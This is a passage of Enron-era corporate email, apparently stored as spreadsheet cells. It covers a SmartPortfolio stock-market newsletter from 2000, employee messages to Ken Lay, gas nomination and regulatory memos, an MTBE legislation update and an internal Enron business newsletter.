&lt;&gt; Smith Micro Software (Nasdaq:SMSI), which skyrocketed 101.80%_x000D_
(up 10 5/8) to 21 1/16 following the company's announcement that_x000D_
it has developed a new wireless Internet access solution._x000D_
_x000D_
&lt;&gt; Globalstar Telecommunications (Nasdaq:GSTRF), which fell_x000D_
12.99% (-2 11/16) to 18 and was one among the most active stocks_x000D_
on the Nasdaq on Thursday following the downgrade of the company_x000D_
by CIBC World Markets._x000D_
_x000D_
&lt;&gt; Copper Mountain (Nasdaq:CMTN), which rose 9.19% (up 8 13/16)_x000D_
to 104 11/16 and rode the wave of a strong overall Nasdaq_x000D_
performance._x000D_
_x000D_
Leading Internet and tech stocks performed as follows:_x000D_
_x000D_
Company                      $ Change   % Change      Close_x000D_
Amazon (Nasdaq:AMZN)          +5 3/16     +8.15%   68 13/16_x000D_
America Online (NYSE:AOL)     +6 1/16    +11.05%   60 15/16_x000D_
Commerce One (Nasdaq:CMRC)     +8 1/8     +3.09%    271 1/4_x000D_
Cisco (Nasdaq:CSCO)          +6 15/16     +5.24%   139 5/16_x000D_
CMGI (Nasdaq:CMGI)             +6 7/8     +4.96%    145 3/8_x000D_
Dell (Nasdaq:DELL)             +3 1/2     +7.46%    50 7/16_x000D_
Ebay (Nasdaq:EBAY)             -1 1/2     -0.82%    182 1/2_x000D_
ExciteAtHome (Nasdaq:ATHM)       -3/8     -1.22%     30 3/8_x000D_
Exodus (Nasdaq:EXDS)          -2 1/16     -1.28%   158 9/16_x000D_
Intel (Nasdaq:INTC)           +3 7/16     +2.99%    118 3/8_x000D_
Juniper (Nasdaq:JNPR)          +1 3/8     +0.50%        276_x000D_
Lucent (NYSE:LU)                 +7/8     +1.29%     68 7/8_x000D_
Microsoft (Nasdaq:MSFT)       +4 7/16     +4.64%        100_x000D_
Oracle (Nasdaq:ORCL)             +7/8     +1.05%         84_x000D_
Schwab (NYSE:SCH)            +1 15/16     +4.31%   46 15/16_x000D_
Sun Micro (Nasdaq:SUNW)            +1     +1.04%     97 1/4_x000D_
Qualcomm (Nasdasq:QCOM)        -2 1/8     -1.65%        127_x000D_
Qwest (NYSE:Q)                +3 1/16     +5.69%     56 7/8_x000D_
Yahoo (Nasdaq:YHOO)            +6 1/4     +3.53%    183 1/4_x000D_
_x000D_
*********************** Advertisement ************************_x000D_
_x000D_
Make the most of your money by visiting Quicken.com today.  Evaluate_x000D_
companies step-by-step the way the experts do.  Track your favorite_x000D_
stocks, receive personalized financial news and all these features and_x000D_
more for free! Click:_x000D_
_x000D_
http://quicken.precision-email.com/go/L90_quicken721_email1/direct/01_x000D_
_x000D_
**************************************************************_x000D_
_x000D_
3. Notable Earnings Announcements_x000D_
_x000D_
For a calendar of recent and upcoming earnings announcements,_x000D_
please visit: http://www.smartportfolio.com/earnings.asp_x000D_
&lt;A HREF="http://www.smartportfolio.com/earnings.asp"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
H.J. Heinz Co. (NYSE:HNZ) announced on Thursday that its fiscal_x000D_
third quarter profits increased 3.5% year-over-year as_x000D_
acquisitions helped boost sales growth.  Earnings for the maker_x000D_
of StarKist canned tuna, Ore-Ida frozen potatoes and 9-Lives cat_x000D_
food came in at 63 cents per share, which beat First Call_x000D_
consensus estimates of 62 cents a share.  Shares of the giant_x000D_
food company best known for its ketchup gained 1/4 (+0.73%) to_x000D_
34 1/2._x000D_
_x000D_
Kroger Co. (NYSE:KR) reported on Thursday higher-than-expected_x000D_
quarterly profits, as a partial result of greater sales of_x000D_
private-label products.  Income came in at 39 cents a share,_x000D_
from 32 cents a share in the year-earlier period, and exceeded_x000D_
First Call consensus estimates of 38 cents a share.  Shares of_x000D_
the #1 U.S. grocery chain closed down 5/8 (-4.07%)to 14 3/4._x000D_
_x000D_
Lands' End (NYSE:LE) announced on Thursday a 17% decline in_x000D_
quarterly sales and posted income of 92 cents a share, missing_x000D_
First Call consensus estimates of $1.09 a share.  Shares of the_x000D_
Internet and catalog retailer rose 4 9/16 (+14.78%) to 35 7/16._x000D_
_x000D_
National Semiconductor (NYSE:NSM) reported on Thursday strong_x000D_
quarterly profits based largely on increased orders and sales in_x000D_
its analog chip business.  Earnings came in at 51 cents a share,_x000D_
beating First Call consensus estimates of 45 cents a share._x000D_
Shares of the giant maker of chips for cellular phones and_x000D_
wireless devices dropped 3 1/2 (-4.24%) to 79._x000D_
_x000D_
4. Notable Upgrades and Downgrades_x000D_
_x000D_
For full coverage of today's upgrades, downgrades and coverage_x000D_
initiations, please click on the appropriate links below:_x000D_
_x000D_
-- Upgrades - http://www.smartportfolio.com/upgrades.asp_x000D_
&lt;A HREF="http://www.smartportfolio.com/upgrades.asp"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
Canon (Nasdaq:CANNY) was upgraded by Merrill Lynch from near-_x000D_
term accumulate to near-term buy.  Shares rose 7/16 (+1.10%) to_x000D_
40 5/16._x000D_
_x000D_
Eli Lilly (NYSE:LLY) was upgraded by SG Cowen from neutral to_x000D_
buy.  Shares gained 4 1/2 (+8.11%) to 60._x000D_
_x000D_
Georgia-Pacific (NYSE:TGP) was upgraded by Credit Suisse First_x000D_
Boston (CSFB) from hold to buy.  Shares closed up closed down_x000D_
3/16 (-0.87%) to 21 1/4._x000D_
_x000D_
-- Downgrades - http://www.smartportfolio.com/downgrades.asp_x000D_
&lt;A HREF="http://www.smartportfolio.com/downgrades.asp"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
American Tower (NYSE:AMT) was downgraded by Morgan Stanley Dean_x000D_
Witter (MSDW) from stong buy to outperform.  Shares fell 7/16 (-_x000D_
0.81%) to 53 1/2._x000D_
_x000D_
Consolidated Papers (NYSE:CDP) was downgraded by CSFB fro buy to_x000D_
hold.  Shares dropped 3/4 (-2.19%) to 33 1/2._x000D_
_x000D_
Globalstar Telecommunications (Nasdaq:GSTRF) was downgraded by_x000D_
CIBC World Markets from buy to hold.  Shares closed down 2 11/16_x000D_
(-12.99%) to 18._x000D_
_x000D_
Quintiles Transnational (Nasdaq:QTRN) was downgraded by Merrill_x000D_
Lynch from near-term accumulate/long-term buy to near-term_x000D_
neutral/long-term accumulate.  Shares fell 4 1/8 (-17.51%) to 19_x000D_
7/16._x000D_
_x000D_
Triton PCS (Nasdaq:TPCS) was downgraded by Lehman Brothers from_x000D_
buy to neutral.  Shares fell 3 7/8 (-5.76%) to 63 3/8._x000D_
_x000D_
-- Coverage Initiations http://www.smartportfolio.com &lt;A_x000D_
HREF="http://www.smartportfolio.com/initiated.asp"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
Several retail clothing stores were initiated by Deutsche Banc_x000D_
Alex. Brown (Deutsche Banc) with a market perform rating,_x000D_
including Ann Taylor Stores (NYSE:ANN), which fell 1/16 (-0.26%)_x000D_
to 23 15/16, and Bebe Stores (Nasdaq:BEBE), which dropped 3/8 (-_x000D_
3.06%) to 11 7/8._x000D_
_x000D_
CompuCredit Corp. (Nasdaq:CCRT) was initiated by JP Morgan with_x000D_
a buy rating.  Shares gained 1 1/2 (+4.71%) to 33 3/8._x000D_
_x000D_
Coventry Health Care (Nasdaq:CVTY) was initiated by Goldman_x000D_
Sachs with a market perform rating.  Shares closed down 1/32 (-_x000D_
0.39%) to 8._x000D_
_x000D_
Globix (Nasdaq:GBIX) was initiated by Merrill Lynch with a near-_x000D_
term buy/long-term buy rating.  Shares closed up 4 3/8 (+8.00%)_x000D_
to 59 1/16._x000D_
_x000D_
Honeywell (NYSE:HON) was initiated by Warburg Dillon Read with a_x000D_
strong buy rating.  Shares rose 1 7/16 (+3.37%) to 44 1/8._x000D_
_x000D_
Radio One (Nasdaq:ROIA) was initiated by Morgan Stanley with a_x000D_
strong buy rating.  Shares rose 2 15/16 (+5.15%) to 60._x000D_
_x000D_
World Access (Nasdaq:WAXS) was initiated by Morgan Stanley with_x000D_
a strong buy rating.  Shares jumped 26.50% (up 5 1/4) to 25_x000D_
1/16._x000D_
_x000D_
5. Stock Splits_x000D_
_x000D_
To obtain the latest information on stock splits, please visit:_x000D_
http://www.smartportfolio.com/splits_x000D_
&lt;A HREF="http://www.smartportfolio.com/splits"&gt;AOL users click_x000D_
here&lt;/A&gt;_x000D_
_x000D_
This chart shows the companies that will split their shares_x000D_
during the next 4 business days.  The "Pay" column shows the_x000D_
payable date.  The "Ex" column refers to the ex-date, the date_x000D_
on which the stock begins to trade at its split-adjusted price._x000D_
The ratio refers to the number of split shares stockholders will_x000D_
receive (a 2:1 ratio means that stockholders will receive one_x000D_
additional share for each share they already hold)._x000D_
_x000D_
Pay     Ex                                   Ann.    Split_x000D_
Date    Date    Company                Sym.  Date    Ratio_x000D_
Mar 10  Mar 13  JDS Uniphase           JDSU  Jan 03  2-1_x000D_
Mar 10  Mar 13  Network Solutions      NSOL  Dec 22  2-1_x000D_
Mar 10  Mar 13  Aspect Development     ASDV  Feb 15  2-1_x000D_
Mar 13  Mar 14  SDL Inc                SDLI  Dec 20  2-1_x000D_
Mar 13  Mar 14  Advanced Digital       ADIC  Feb 17  2-1_x000D_
Mar 13  Mar 14  Advent Software        ADVS  Feb 17  2-1_x000D_
Mar 13  Mar 14  NetVoice              NTVTE  Feb 15  2-1_x000D_
Mar 13  Mar 14  BroadVision            BVSN  Feb 09  3-1_x000D_
Mar 14  Mar 15  Brocade Communications BRCD  Feb 17  2-1_x000D_
_x000D_
6. IPO Commentary - http://www.smartportfolio.com/ipo_x000D_
&lt;A HREF="http://www.smartportfolio.com/ipo"&gt;AOL users click_x000D_
here.&lt;/A&gt;_x000D_
_x000D_
Two IPOs made their public debuts on Thursday amid a very_x000D_
healthy, broad-market rally.  Shares of OraPharma, Inc._x000D_
(NASDAQ:OPHM), a developer of pharmaceutical products for the_x000D_
treatment of oral diseases and disorders, bolted 73.61% to close_x000D_
at 31 1/4, while shares of Riverdeep (Nasdaq:RVDPV), a provider_x000D_
of technology based educational solutions, soared 243.30% to_x000D_
close at 66 55/64._x000D_
_x000D_
In a show of strength, OTG Software, Inc. (NASDAQ:OTGS), a_x000D_
provider of online data storage management and data access_x000D_
solutions, sharply increased its pricing terms:  OTG's_x000D_
underwriter increased the number of shares from 4 million to 5_x000D_
million and increased the pricing range from $12-$14 to $16-$18._x000D_
In addition, Selectica, Inc. (NASDAQ:SLTC), a provider of_x000D_
Internet selling system software and services, increased its_x000D_
pricing range from $9-$11 to $23-$25._x000D_
_x000D_
It seemed impossible for investors to become any more excited_x000D_
about technology/Internet stocks, but apparently they have.  To_x000D_
find out more about OTG Software and Selectica and to learn of_x000D_
more upcoming IPOs that are in strong demand, please go to_x000D_
http://www.smartportfolio.com/freetrial_x000D_
&lt;A HREF="http://www.smartportfolio.com/freetrial"&gt;AOL users click_x000D_
here.&lt;/A&gt;_x000D_
_x000D_
7.  IPOs Trading Thursday_x000D_
_x000D_
OraPharma Inc (NASDAQ:OPHM) - Developer of pharmaceutical_x000D_
products for the treatment of oral diseases and disorders._x000D_
Price: 18  Open: 24  High: 36 7/8_x000D_
Close: 31 1/4 Change: +13 1/4 (+73.61%)_x000D_
_x000D_
Riverdeep (Nasdaq:RVDPV) - Provider of technology based_x000D_
educational solutions, specializing in creating educational_x000D_
software for the K-12 market, delivered over the Internet._x000D_
Price: 20  Open: 58 1/8  High: 72 1/2_x000D_
Close: 66 55/64 Change: +46 55/64 (+243.30%)_x000D_
_x000D_
8. IPO Calendar - http://www.smartportfolio.com/ipo_x000D_
&lt;A HREF="http://www.smartportfolio.com/ipo"&gt;AOL users click_x000D_
here.&lt;/A&gt;_x000D_
_x000D_
*Indicates an Internet related issue._x000D_
_x000D_
3/9 - New China Homes Ltd (NASDAQ:-TBA-) - Builds homes in_x000D_
planned residential communities for middle-class Chinese_x000D_
families._x000D_
_x000D_
*3/10 - OTG Software Inc (NASDAQ:OTGS) - Provider of online data_x000D_
storage management and data access solutions._x000D_
_x000D_
*3/10 - Gt Group Telecom (Nasdaq:GTTL) - Operator of a national_x000D_
broadband network, providing Internet, high-speed data and voice_x000D_
services to businesses in Canada._x000D_
_x000D_
*3/10 - HomeGrocer.com Inc (NASDAQ:HOMG) - An Internet retailer_x000D_
of grocery and other consumer products._x000D_
_x000D_
*3/10 - Selectica Inc (NASDAQ:SLTC) - Provider of Internet_x000D_
selling system software and services that enable companies to_x000D_
efficiently sell complex products and services over intranets,_x000D_
extranets and the Internet._x000D_
_x000D_
3/10 - Stratus Services Group Inc (NASDAQ:SERV) - Provider of_x000D_
temporary staffing and engineering services._x000D_
_x000D_
3/10 - Bio Aqua Systems Inc (AMEX:SEA) - Holding company for_x000D_
Tepual, S.A., a Chilean corporation that sells various branded_x000D_
products for animal nutrition, including fish meal, feather meal_x000D_
and krill meal._x000D_
_x000D_
*3/10 - SUNDAY Communication (NASDAQ:SDAY) - Provider of wireless_x000D_
communication and Internet services in Hong Kong._x000D_
_x000D_
********************* Advertisement *************************_x000D_
_x000D_
REDBACK NETWORKS JUMPS NEARLY 10% AFTER ANNOUNCING STOCK SPLIT!_x000D_
  Smart!Splits Readers Knew About it Beforehand!  Did you?_x000D_
_x000D_
Didn't know that Redback Networks (Nasdaq:RBAK) was going to_x000D_
announce a stock split yesterday?  Subscribers to the_x000D_
Smart!Splits Report were informed of this possibility in last_x000D_
week's report!_x000D_
_x000D_
To find out about the next stock split that can enhance your_x000D_
portfolio, visit: http://www.smartportfolio.com/freetrials_x000D_
&lt;A HREF="http://www.smartportfolio.com/freetrials"&gt;AOL users_x000D_
click here&lt;/A&gt;_x000D_
_x000D_
*************************************************************_x000D_
_x000D_
**************************************************************_x000D_
_x000D_
       ALL NEW USER COMMENTS SECTION ON OUR WEB PAGE_x000D_
_x000D_
The SmartPortfolio.Com team has received hundreds of positive e-_x000D_
mails from our subscribers and, as a result, we are compiling a_x000D_
testimonial section on our Web site for everyone's benefit.  If_x000D_
you are interested in having your testimonial appear, please e-_x000D_
mail your comments to Chris McLaughlin, President of_x000D_
SmartPortfolio.Com, at chrism@smartportfolio.com and please_x000D_
indicate your e-mail address, full name, location and the_x000D_
SmartPortfolio.Com products that you currently are subscribed to_x000D_
(e.g., Free Update, Smart!Splits Report, Smart!IPO Report or_x000D_
Smart!Internet Report).  While we will post your name and_x000D_
location, we will post your e-mail address only if you indicate_x000D_
to us that we may do so._x000D_
_x000D_
***************************************************************_x000D_
_x000D_
***************************************************************_x000D_
_x000D_
                PLEASE GIVE US YOUR FEEDBACK_x000D_
_x000D_
If you have any additional information that you would like us to_x000D_
include in our newsletter, any additional functionality added to_x000D_
our website, or any other comments in general, please let us_x000D_
know by clicking on the following link:_x000D_
http://www.smartportfolio.com/feedback_x000D_
_x000D_
***************************************************************_x000D_
_x000D_
***************************************************************_x000D_
_x000D_
                 ADVERTISE IN OUR NEWSLETTER_x000D_
_x000D_
Want to target an attractive demographic representing wealthy,_x000D_
astute, Internet-inclined investors?  Please send your_x000D_
advertising inquiries to: mailto:ads@smartportfolio.com_x000D_
_x000D_
***************************************************************_x000D_
_x000D_
_x000D_
_x000D_
---_x000D_
You are currently subscribed to update as: sshackl@ect.enron.com_x000D_
To unsubscribe send a blank email to _x000D_
leave-update-25348W@smartportfolio.sparklist.com_x000D_
To change your e-mail address, please visit: _x000D_
http://www.smartportfolio.com/changeIf you are a Smart!Report subscriber, to _x000D_
make changes to your account please visit: _x000D_
http://www.smartportfolio.com/service_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jackie.henry@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'kenneth.lay@enron.com', 'thomas.white@enron.com', 'dan.leff@enron.com'})</t>
  </si>
  <si>
    <t>Thank You!</t>
  </si>
  <si>
    <t xml:space="preserve">For years I followed the positive contributions ENRON made to the community _x000D_
and its staff.  I always dreamed of working for a company that truly cared.  _x000D_
My prayers were answered.  I am proud to be a part of this team and look _x000D_
forward to many years of prosperity and success.  After working for a private _x000D_
practice for 10 years and being told that the corporate work environment was _x000D_
impersonal, I have seen ENRON promote and display respect, integrity, _x000D_
communication and excellence.  If someone gives respect, the person receiving _x000D_
it might build up their self-esteem and in return respect others.  Being _x000D_
honest gains trust and sometimes trust can be more valuable than money.  _x000D_
Without communication, walls are built and eventually tumble down hurting _x000D_
everyone/everything surrounding them.  I really applaud your vision on _x000D_
communication.  Good communication is the main ingredient in every view of _x000D_
life.  Keep up the good work.  Striving for excellence encourages people to _x000D_
work hard, utilize their creative minds, explore new areas, and learn to _x000D_
adjust to change.  _x000D_
_x000D_
Thank you again for allowing me to be a part of such a GREAT team.    </t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 14:40:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 02:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Correction to 4/5/00 Nominations for Eastrans and Nomination_x000D_
 for 4/6/00</t>
  </si>
  <si>
    <t xml:space="preserve">This is the latest update via a verbal agreement between Chad Cass and Darren_x000D_
Farmer..._x000D_
_x000D_
APRIL 5_x000D_
_x000D_
Effective 9:00 am the nominations and redeliveries are "0"_x000D_
_x000D_
The Fuels Cotton Valley volume of 7800 mmbtu will be purchased by HPL at Gas_x000D_
Daily (HSC -5)._x000D_
_x000D_
APRIL 6_x000D_
_x000D_
Effective 9:00 am the nominations and redeliveries are "0"_x000D_
_x000D_
   The Fuels Cotton Valley volume of 7800 mmbtu will be purchased by HPL at _x000D_
Gas_x000D_
Daily (HSC -5)._x000D_
_x000D_
   APRIL 7_x000D_
_x000D_
   Until further notice the nominations and redeliveries will be at "0"_x000D_
   Fuels Cotton Valley gas  will be purchased by HPL at a "to be determined_x000D_
price."  **_x000D_
_x000D_
   **Darren- please give me a call so we can discuss the pricing for the FCV_x000D_
gas._x000D_
_x000D_
   If anyone has any questions please feel free to give me a call._x000D_
_x000D_
   Thanks,_x000D_
   Chad Cass_x000D_
   713-627-6202_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Marta K Henderson_x000D_
04/06/2000 07:49 AM_x000D_
_x000D_
Sent by:  Marta K Henderson_x000D_
_x000D_
_x000D_
To:   stacey.neuweiler@enron.com, dfarmer@enron.com, briley@enron.com_x000D_
cc:   William E. Speckels/GCS/CEC/PEC@PEC, Chad W. Cass/GCS/CEC/PEC@PEC, _x000D_
Darrel_x000D_
      F. Bane/EastTexas/PEFS/PEC@PEC, Michael R. _x000D_
Cherry/EastTexas/PEFS/PEC@PEC,_x000D_
      Donna C. Spencer/GCS/CEC/PEC@PEC, Cheryl L. Horning/GCS/CEC/PEC@PEC, _x000D_
Julia_x000D_
      A. Mohn/GCS/CEC/PEC@PEC, Dora J. Levy/GCS/CEC/PEC@PEC, Bruce_x000D_
      McMills/FtWorth/PEFS/PEC@PEC, Sharon Beemer/FtWorth/PEFS/PEC@PEC_x000D_
Subject:  Correction to 4/5/00 Nominations for Eastrans and Nomination for_x000D_
      4/6/00_x000D_
Beginning 2:00 pm on 4/5/00 nomination:_x000D_
_x000D_
Deliveries:_x000D_
0 MMBtu into Eastrans_x000D_
_x000D_
Redeliveries:_x000D_
0 MMBtu_x000D_
_x000D_
For 4/6/00, the nomination is as follows:_x000D_
_x000D_
Deliveries:_x000D_
0 MMBtu into Eastrans_x000D_
_x000D_
Redeliveries:_x000D_
0 MMBtu_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 31 Aug 2001 17:58:50 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Leslie:  please take a look at the attached.  It summarizes our discussion re:  FERC review and impact on gas activities._x000D_
_x000D_
Jim:  can you check with Robert George to see if business units considered Leslie's memorandum re:  impact on gas activities.   We need to close this loop asap._x000D_
_x000D_
Mark Metts wanted me to give a regulatory overview to Andy Fastow next week.  _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sat, 29 Dec 2001 03:21:27 -0800 (PST)</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 08:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'velvet.sugarek@enron.com'})</t>
  </si>
  <si>
    <t>Heart Breaking</t>
  </si>
  <si>
    <t>_x000D_
The tears rolled down my face the night Channel 11 broke through with the a=_x000D_
nnouncement that Enron was going to merge with Dynegy. My heart was breakin=_x000D_
g, seeing the hurt in Ken Lay's eyes and to see our company tumbling down a=_x000D_
s if it was the New York Trade Center this was my first thought and questio=_x000D_
n how could a few cruel and selfish individuals bring something so wonderfu=_x000D_
l down after so many years of hard work? The E means something to me. I'm s=_x000D_
o proud to be apart of this great company that you and Enron employees buil=_x000D_
t. There are so many roomers of blame, but I can't for a second believe you=_x000D_
 had anything to do with this I know your a man of your word and speak from=_x000D_
 your heart and I'm so sorry you couldn't enjoy your retirement and had to =_x000D_
come back to this mess. I just wanted you to know that I'm behind your deci=_x000D_
sions and have the utmost respect for you also. Hopefully some day the indi=_x000D_
viduals that put this great company down will be held accountable and be ma=_x000D_
de put the money they stole back to the company. Take care of yourself and =_x000D_
your health we need you._x000D_
Sincerely, Velvet</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shortridge@erols.com', 'lisa.yoho@enron.com', 'linda.robertson@enron.com', 'stanley.horton@enron.com', 'james.prentice@enron.com', 'chris.long@enron.com', 'steven.kean@enron.com', 'adam.pollock@enron.com', 'richard.shapiro@enron.com', 'jim.peterson@enron.com', 'lisa.jacobson@enron.com', 'joe.hartsoe@enron.com', 'marc.phillips@enron.com', 'michael.terraso@enron.com'})</t>
  </si>
  <si>
    <t>Today, Senators Bob Smith (R-NH) and Harry Reid (D-NV) will introduce an MTBE _x000D_
bill. which is expected to be slightly different than we've seen in previous _x000D_
Congresses.  _x000D_
_x000D_
We expect it to include:  _x000D_
_x000D_
1) a 4-year date certain to eliminate MTBE, with EPA determining the phaseout _x000D_
schedule_x000D_
2)  a lifting of the 2% oxygenate standard upon perfunctory petition by State _x000D_
governors within 90 days from date of enactment_x000D_
3)  and environmental "anti-backsliding" provision focused only on air-toxics _x000D_
and using a 2000 baseline with a 27.5% percent standard (the way I understand _x000D_
it right now, RFG must perform 27.5% better than 2000 baseline for _x000D_
conventional gasoline)_x000D_
4) provisions for MTBE producer "transition assistance"_x000D_
_x000D_
Brief analysis:  _x000D_
_x000D_
We'll have more details shortly, but the bill looks a little better than _x000D_
previous efforts.  A number of bills have been introduced this Congress, but _x000D_
this will probably be the leading effort.  _x000D_
_x000D_
As you know, Enron has led efforts to include the "transition assistance" _x000D_
piece -- which is still largely undefined in the legislation -- but we are _x000D_
pleased with the inclusion of a "placeholder" while the Senate decides on the _x000D_
best approach.  We will continue to lead the development of such incentives _x000D_
(which will likely take the form of EPA/DOE funding for MTBE producers who _x000D_
convert plants to produce iso-octane or alkylate)._x000D_
_x000D_
An MTBE ban is of course not good, but a "date certain" gives producers more _x000D_
flexibility to determine their options rather than reduce production under _x000D_
several steps of a phase out.   Allowing states to get a waiver of the oxy _x000D_
standard is probably a given in any legislation, but will face some _x000D_
opposition from the ethanol community -- who just want a simple MTBE ban._x000D_
_x000D_
The anti-backsliding provision is still being refined, but looks fairly _x000D_
lame.  We need more details to make an accurate assessment, but its likely _x000D_
that environmental groups will want a bit more._x000D_
_x000D_
One political factor -- with Sen. Jim Jeffords leaving the Republican party, _x000D_
Democrats will be given control of the Senate Environment Committee, which _x000D_
will consider this bill.  They will likely allow Jeffords to chair the _x000D_
committee.  The significance is that Sen. Bob Smith (R-NH) is the current _x000D_
chair, and has been able to use that position to drive his past bills on MTBE _x000D_
-- in losing the chairmanship, his legislation may face a longer road through _x000D_
Committee._x000D_
_x000D_
I will keep you posted as the legislation evolves._x000D_
_x000D_
Jeffrey Keeler_x000D_
Director, Environmental Strategies_x000D_
Enron_x000D_
Washington DC office - (202) 466-9157_x000D_
Cell Phone (203) 464-1541</t>
  </si>
  <si>
    <t>Tue, 3 Jul 2001 14:24:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
=20_x000D_
_x000D_
_x000D_
BUSINESS HIGHLIGHTS_x000D_
_x000D_
Enron Mexico_x000D_
Jaime Williams will head up the Monterrey office with responsibility for Ri=_x000D_
sk Management and Trading.  Steve Irvin will take over responsibility for a=_x000D_
ll origination activities in Mexico and will be based in Houston.  Both Jai=_x000D_
me and Steve will report directly to the Office of the Chair, Enron America=_x000D_
s._x000D_
_x000D_
Weather_x000D_
The weather desk is rapidly expanding.  With a presence in Houston, London,=_x000D_
 Sydney, and Tokyo (and possibly in New York), the desk has expanded from a=_x000D_
bout 15 people in January to a current count of over 40 globally.  Mark Taw=_x000D_
ney recently went to Tokyo to explore joint marketing efforts with signific=_x000D_
ant Japanese corporations and to meet with the newest additions to the Toky=_x000D_
o weather team.  Paul Murray (reporting to Mark) is leading the European ef=_x000D_
fort out of London and has already increased the staffing there from 1 to 5=_x000D_
.  If you're in the London office, please take him out to a pub or two - ap=_x000D_
parently he's had trouble finding them on his own.  If you have interest in=_x000D_
 joining an exciting new industry, please feel free to call Dave Hill at x3=_x000D_
4218.=20_x000D_
_x000D_
_x000D_
IN THE NEWS_x000D_
_x000D_
Goldman Sachs Analysts, David Fleischer, David Maccarrone and Eric Mandelbl=_x000D_
att on Enron in their latest analyst comment, "A LOT Better Than it Feels; =_x000D_
Prospects Never Better:  Raising Estimates":_x000D_
_x000D_
"Our confidence in the direction of ENE's strategy and our conviction in th=_x000D_
e continuing strong execution of its business plan continue to be extremely=_x000D_
 high. " =20_x000D_
_x000D_
"... investors have cast doubt about both the company's strategy and manage=_x000D_
ment's execution of its wide ranging and ambitious business plans. We have =_x000D_
no such doubt."_x000D_
_x000D_
"We absolutely believe that Enron's very broad capabilities are transferabl=_x000D_
e to a wide variety of products and commodities and also see it as critical=_x000D_
 to emphasize that the company's wholesale operation is much more than the =_x000D_
trading business may view it as being. . ."_x000D_
_x000D_
_x000D_
WELCOME_x000D_
New Hires_x000D_
EGM  - Richard Friedman, Vivek Kumar, Alex McElreath, Fred Radvansky, Jonat=_x000D_
han Sarley, Pat Twohy=20_x000D_
EIM   - Tim Reed, Sonia Trevino, Greg Worsham_x000D_
ENA  - Alisha Mahabir, Jennifer Smith, Nancy Turner_x000D_
_x000D_
_x000D_
NUGGETS &amp; NOTES_x000D_
_x000D_
Travel tip of the week:_x000D_
Car rental contracts for year 2001 have been awarded to National Car Rental=_x000D_
 and Alamo Rent-a-Car.  Please communicate the contract identification numb=_x000D_
er at the time the reservation is made._x000D_
=09Alamo=09=09  143974_x000D_
=09National=09=095000838_x000D_
_x000D_
Insurance is included in Enron's negotiated rates; if asked please decline =_x000D_
the Optional Liability Insurance and Collision Damage Waver offered by the =_x000D_
gate agent.  Coverage applies only if the appropriate contract identificati=_x000D_
on number has been communicated.  Negotiated discounts represent 20% off cu=_x000D_
stomary rates._x000D_
_x000D_
Congratulations to Derrick and Paula Harris, manager in Business Analysis a=_x000D_
nd Reporting, on the birth of daughter, Jazmine Kay on June 14, 2001._x000D_
_x000D_
Congratulations to Shannon and Greg Whiting, director in BA&amp;R, on the birth=_x000D_
 of their daughter, Irene Elizabeth, on Friday, June 22, 2001._x000D_
_x000D_
_x000D_
EnronOnline Statistics_x000D_
_x000D_
Below are the latest figures for EnronOnline as of June 29, 2001_x000D_
_x000D_
=09*Total Life to Date Transactions &gt; 1,150,000_x000D_
=09*Life to Date Notional Value of Transactions &gt; $684 billion_x000D_
_x000D_
_x000D_
NEWS FROM THE GLOBAL FLASH_x000D_
_x000D_
EES Europe Lands First Outsourcing Deal_x000D_
Congratulations to EES Europe who recently clinched their first outsourcing=_x000D_
 transaction with supermarket giant, Sainsbury's.  The deal means EES will =_x000D_
provide gas and electricity to all 493 Sainsbury's properties in the UK inc=_x000D_
luding stores, offices and depots. EES will also manage a program of energy=_x000D_
 reduction measures designed to improve energy efficiency at Sainsbury's fa=_x000D_
cilities._x000D_
_x000D_
Stuart Rexrode, Vice President of EES Europe, said: "This was a sensational=_x000D_
 team effort - a fantastic achievement for EES Europe and a truly groundbre=_x000D_
aking transaction in the marketplace.  The whole group should all be extrem=_x000D_
ely proud and I am confident that this is the start of many more outsourcin=_x000D_
g deals to come."_x000D_
_x000D_
EBS Europe_x000D_
EBS Europe has just completed its 100th transaction. The transaction involv=_x000D_
es a 12-month contract for an STM-4 circuit from London to Madrid. This cap=_x000D_
acity is equivalent to approximately 830 DSL lines or Internet connections =_x000D_
into the home.  Commenting on the achievement, Matthew Scrimshaw, President=_x000D_
 of EBS Europe said, "This is just one of the many milestones that EBS will=_x000D_
 achieve, as we continue to create a market for bandwidth trading and origi=_x000D_
nation."_x000D_
_x000D_
Pioneering International Coal Agreements Signed_x000D_
Enron has signed a five-year agreement with Spanish utility HidroElectrica =_x000D_
del Cantabrico for the import of at least 600,000 tonnes of steam coal per =_x000D_
annum in Enron's first long-term coal import deal into Spain.  The agreemen=_x000D_
t gives Enron full optionality with regard to sourcing, timing and quantity=_x000D_
 of coal supply, which will be delivered via the port of Gijon in northern =_x000D_
Spain and transported by rail and truck to a number of coal-fired power sta=_x000D_
tions, predominantly in the north of the country.  Gijon itself could becom=_x000D_
e a trading hub for Spain's rapidly expanding coal market. "Spain is experi=_x000D_
encing strong demand growth for electricity generation and with an annual p=_x000D_
roduction of only 17 million tonnes of expensive, low-quality coal at its d=_x000D_
isposal, the country has a need for new, flexible sources of supply - so th=_x000D_
ere's lots of opportunity for us to extend the scope of our agreement," say=_x000D_
s Sam Grossman, Enron's coal group director who led the team which included=_x000D_
